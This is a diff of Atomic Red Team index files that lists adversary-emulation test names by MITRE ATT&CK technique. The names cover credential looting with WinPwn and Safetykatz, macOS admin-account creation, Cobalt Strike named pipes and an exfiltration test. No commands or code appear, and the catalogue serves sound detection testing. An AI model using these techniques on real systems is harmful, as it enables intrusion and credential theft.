+persistence,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+persistence,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -831,6 +836,7 @@ discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959
 discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
 discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
 discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
+discovery,T1033,System Owner/User Discovery,6,System Discovery - SocGholish whoami,3d257a03-eb80-41c5-b744-bb37ac7f65c7,powershell
 discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
 discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
 discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
@@ -1061,8 +1067,8 @@ initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Sour
 initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
-initial-access,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-initial-access,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+initial-access,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+initial-access,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
 exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-c29b-49dc-b466-2147a6191932,powershell
@@ -59,7 +59,9 @@
 - [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
  - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
  - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
- T1136.003 Create Account: Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
+  - Atomic Test #2: Azure AD - Create a new user [azure-ad]
+  - Atomic Test #3: Azure AD - Create a new user via Azure CLI [azure-ad]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
  - Atomic Test #4: Azure AD - adding user to Azure AD role [azure-ad]
  - Atomic Test #5: Azure AD - adding service principal to Azure AD role [azure-ad]
@@ -22,6 +22,7 @@
 - T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]

 # credential-access
 - T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -94,6 +95,7 @@
 - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]

 # collection
 - T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -112,6 +114,7 @@
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]

 # lateral-movement
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -122,6 +125,7 @@
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]

 # execution
 - T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -171,6 +171,7 @@
  - Atomic Test #4: Base64 decoding with Perl [linux, macos]
  - Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
  - Atomic Test #6: Hex decoding with shell utilities [linux, macos]
+  - Atomic Test #7: Linux Base64 Encoded Shebang in CLI [linux, macos]
 - [T1562 Impair Defenses](../../T1562/T1562.md)
  - Atomic Test #1: Windows Disable LSA Protection [windows]
 - [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
@@ -642,6 +643,7 @@
 - T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.004 Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md)
  - Atomic Test #1: Alternate Data Streams (ADS) [windows]
@@ -663,8 +665,11 @@
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
  - Atomic Test #1: Create local account with admin privileges [windows]
  - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
  - Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
@@ -971,6 +976,7 @@
  - Atomic Test #1: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt [windows]
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
  - Atomic Test #1: At.exe Scheduled task [windows]
  - Atomic Test #2: At - Schedule a job [linux]
@@ -983,8 +989,11 @@
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
  - Atomic Test #1: Create local account with admin privileges [windows]
  - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
  - Atomic Test #1: User scope COR_PROFILER [windows]
  - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1116,7 +1125,12 @@
  - Atomic Test #9: Obfuscated command line scripts [linux]
  - Atomic Test #10: Change login shell [linux]
  - Atomic Test #11: Environment variable scripts [linux]
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1559 Inter-Process Communication](../../T1559/T1559.md)
+  - Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows]
+  - Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows]
+  - Atomic Test #3: Cobalt Strike SSH (postex_ssh) pipe [windows]
+  - Atomic Test #4: Cobalt Strike post-exploitation pipe (4.2 and later) [windows]
+  - Atomic Test #5: Cobalt Strike post-exploitation pipe (before 4.2) [windows]
 - T1204.003 Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1370,6 +1384,8 @@
  - Atomic Test #16: secedit used to create a Run key in the HKLM Hive [windows]
 - [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
  - Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
+  - Atomic Test #2: Azure AD - Create a new user [azure-ad]
+  - Atomic Test #3: Azure AD - Create a new user via Azure CLI [azure-ad]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
  - Atomic Test #1: Admin Account Manipulate [windows]
  - Atomic Test #2: Domain Account and Group Manipulate [windows]
@@ -1474,6 +1490,7 @@
  - Atomic Test #1: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt [windows]
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
  - Atomic Test #1: At.exe Scheduled task [windows]
  - Atomic Test #2: At - Schedule a job [linux]
@@ -1486,8 +1503,11 @@
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
  - Atomic Test #1: Create local account with admin privileges [windows]
  - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
  - Atomic Test #1: User scope COR_PROFILER [windows]
  - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1887,6 +1907,7 @@
  - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
  - Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
  - Atomic Test #5: GetCurrent User with PowerShell Script [windows]
+  - Atomic Test #6: System Discovery - SocGholish whoami [windows]
 - [T1613 Container and Resource Discovery](../../T1613/T1613.md)
  - Atomic Test #1: Container and ResourceDiscovery [containers]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2006,7 +2027,8 @@
  - Atomic Test #1: List Process Main Windows - C# .NET [windows]
 - T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1580 Cloud Infrastructure Discovery](../../T1580/T1580.md)
+  - Atomic Test #1: AWS - EC2 Enumeration from Cloud Instance [linux, macos]
 - [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
  - Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux]
  - Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
@@ -2442,12 +2464,16 @@
 - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 - T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
  - Atomic Test #1: Create local account with admin privileges [windows]
  - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]

 # exfiltration
 - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -54,6 +54,7 @@
  - Atomic Test #4: Base64 decoding with Perl [linux, macos]
  - Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
  - Atomic Test #6: Hex decoding with shell utilities [linux, macos]
+  - Atomic Test #7: Linux Base64 Encoded Shebang in CLI [linux, macos]
 - T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -48,6 +48,7 @@
  - Atomic Test #4: Base64 decoding with Perl [linux, macos]
  - Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
  - Atomic Test #6: Hex decoding with shell utilities [linux, macos]
+  - Atomic Test #7: Linux Base64 Encoded Shebang in CLI [linux, macos]
 - T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -156,6 +157,9 @@
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
  - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

 # collection
@@ -302,6 +306,9 @@
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
  - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]

 # privilege-escalation
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -376,6 +383,9 @@
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
  - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]

 # credential-access
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -661,6 +671,9 @@
 - T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
  - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]

 # exfiltration
 - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -492,8 +492,8 @@
 - T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
  - Atomic Test #1: Create local account with admin privileges [windows]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
  - Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
@@ -721,8 +721,8 @@
  - Atomic Test #1: Netsh Helper DLL Registration [windows]
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
  - Atomic Test #1: Create local account with admin privileges [windows]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
  - Atomic Test #1: User scope COR_PROFILER [windows]
  - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -815,7 +815,12 @@
  - Atomic Test #22: Abuse Nslookup with DNS Records [windows]
 - T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1559 Inter-Process Communication](../../T1559/T1559.md)
+  - Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows]
+  - Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows]
+  - Atomic Test #3: Cobalt Strike SSH (postex_ssh) pipe [windows]
+  - Atomic Test #4: Cobalt Strike post-exploitation pipe (4.2 and later) [windows]
+  - Atomic Test #5: Cobalt Strike post-exploitation pipe (before 4.2) [windows]
 - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1070,8 +1075,8 @@
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
  - Atomic Test #1: Create local account with admin privileges [windows]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
  - Atomic Test #1: User scope COR_PROFILER [windows]
  - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1364,6 +1369,7 @@
  - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
  - Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
  - Atomic Test #5: GetCurrent User with PowerShell Script [windows]
+  - Atomic Test #6: System Discovery - SocGholish whoami [windows]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1615 Group Policy Discovery](../../T1615/T1615.md)
@@ -1736,8 +1742,8 @@
 - T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
  - Atomic Test #1: Create local account with admin privileges [windows]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]

 # exfiltration
 - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -20,7 +20,7 @@
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Window Discovery](../../T1010/T1010.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
-| [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
